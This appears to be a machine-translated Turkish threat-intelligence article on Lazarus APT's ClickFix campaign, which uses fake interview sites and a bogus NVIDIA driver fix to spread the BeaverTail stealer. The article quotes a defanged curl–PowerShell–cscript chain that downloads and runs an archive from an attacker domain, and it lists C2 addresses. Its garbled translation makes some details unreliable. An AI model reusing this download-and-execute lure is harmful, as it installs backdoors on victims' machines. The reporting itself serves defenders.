Hassas zeka verilerini çalmak için ClickFix tekniğini kullanan Lazarus Apt Hackers

Kötü şöhretli Lazarus APT Grubu, kötü amaçlı yazılım dağıtmak ve hassas zeka verilerini hedeflenen kuruluşlardan çalmak için giderek daha popüler olan ClickFix sosyal mühendislik tekniğini dahil ederek saldırı metodolojisini geliştirdi.

Güvenlik araştırmacıları tarafından dahili olarak APT-Q-1 olarak izlenen bu Kuzey Koreli bağlı tehdit aktörü, aldatıcı kullanıcı arayüzü manipülasyonunu geleneksel casusluk operasyonlarıyla entegre ederek dikkate değer bir uyarlanabilirlik göstermiştir.

ClickFix tekniği, saldırganların kurbanlara fabrikasyon teknik sorunlar sundukları, daha sonra gerçekte kötü amaçlı kod uygulayan meşru “düzeltmeler” yoluyla yönlendirdikleri sofistike bir sosyal mühendislik yaklaşımını temsil ediyor.

Lazarus, bu yöntemi yerleşik sahte işe alım kampanyası altyapılarında silahlandırdı ve iş fırsatı cazibesini teknik aldatma ile birleştiren çok katmanlı bir saldırı vektörü oluşturdu.

CN-SEC analistleri, bu kampanyayı, daha sonra grubun imzası Beaverilil bilgi stealer’ı dağıtan NVIDIA yazılım paketlerini indiren kötü amaçlı bir toplu betiğin keşfedilmesiyle tanımladı.

Saldırı zinciri, kurbanlar, mülakat ortamlarını hazırlamaya teşvik eden hileli görüşme web sitelerine çekildiğinde başlar ve sonunda kamera yapılandırma sorunlarının derhal çözülmesi gerektiğini iddia eder.

Bu operasyonun teknik karmaşıklığı basit sosyal mühendisliğin ötesine uzanmaktadır. Mağdurlara meşru bir NVIDIA sürücü güncelleme komutu gibi görünen şey sunulur, ancak temel yük yükü kötü niyetli bir yürütme dizisine dönüşür.

Birincil enfeksiyon vektörü, tehlikeye atılan altyapıdan kötü amaçlı bir fermuar arşivini indiren ve çıkaran bir PowerShell komutu kullanır.

Son analizler, grubun hem Windows hem de MacOS platformlarını hedeflemek için işlemleri genişlettiğini ve farklı işletim sistemi mimarileri için özel yükler yoluyla platformlar arası yetenekleri gösterdiğini ortaya koyuyor.

Windows varyantı, node.js tabanlı dağıtım mekanizmaları aracılığıyla kurumsal ortamlara odaklanırken, macOS sürümleri Apple Silikon ve Intel işlemciler için tasarlanmış kabuk komut dosyalarını kullanır.

Kötü amaçlı yazılım dağıtım ve kalıcılık mekanizmaları

“NVIDIARELEASE olarak dağıtılan temel kötü amaçlı yazılım paketi[.]Zip ”(MD5: F9E18687A38E968811B93351E9FCA089), platformlar arası uyumluluk ve kalıcı erişim için tasarlanmış birden fazla bileşen içerir.

Başlangıç ​​ClickFix-1.BAT komut dosyası aşağıdaki komut sırasını yürütür:-

curl - k - o "%TEMP%\\nvidiaRelease[.]zip" https[:]//driverservices[.]store/visiodrive/nvidiaRelease[.]zip && powershell - Command "Expand-Archive - Force - Path '%TEMP%\\nvidiaRelease[.]zip' - DestinationPath '%TEMP%\\nvidiaRelease'" && cscript "%TEMP%\\nvidiaRelease\\run[.]vbs"

Çıkarılan Arşiv Dağıtımları Run[.]Windows derleme numarasını belirlemek için sistem keşif yapan VBS.

Windows 11 sistemleri için (22000 veya daha yüksek bir oluşturma), komut dosyası ayrıca drvupdate’i yürütür[.]Exe, komut yürütme ve dosya manipülasyonu yapabilen sofistike bir arka kapı.

Bu ikili, 103.231.75.101:8888 numaralı telefondan komut ve kontrol sunucuları ile iletişim kurar ve sistem bilgileri toplama, uzaktan komut yürütme ve dosya aktarım özellikleri gibi işlevleri uygular.

Çekirdek kötü amaçlı yazılım bileşenleri:-

Kötü amaçlı yazılım, kayıt defteri modifikasyonu yoluyla kalıcılık sağlar ve sistem yeniden başlatmalarında yürütülmesini sağlayan Windows başlangıç ​​kayıt defteri anahtarına bir giriş ekler.

Beaverail bileşeni, 45.159.248.110 adresinde altyapı ile iletişim kurarak, uzlaşmış sistemlere uzun vadeli erişimi sürdürmek için gereksiz komuta ve kontrol özelliklerini gösterir.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.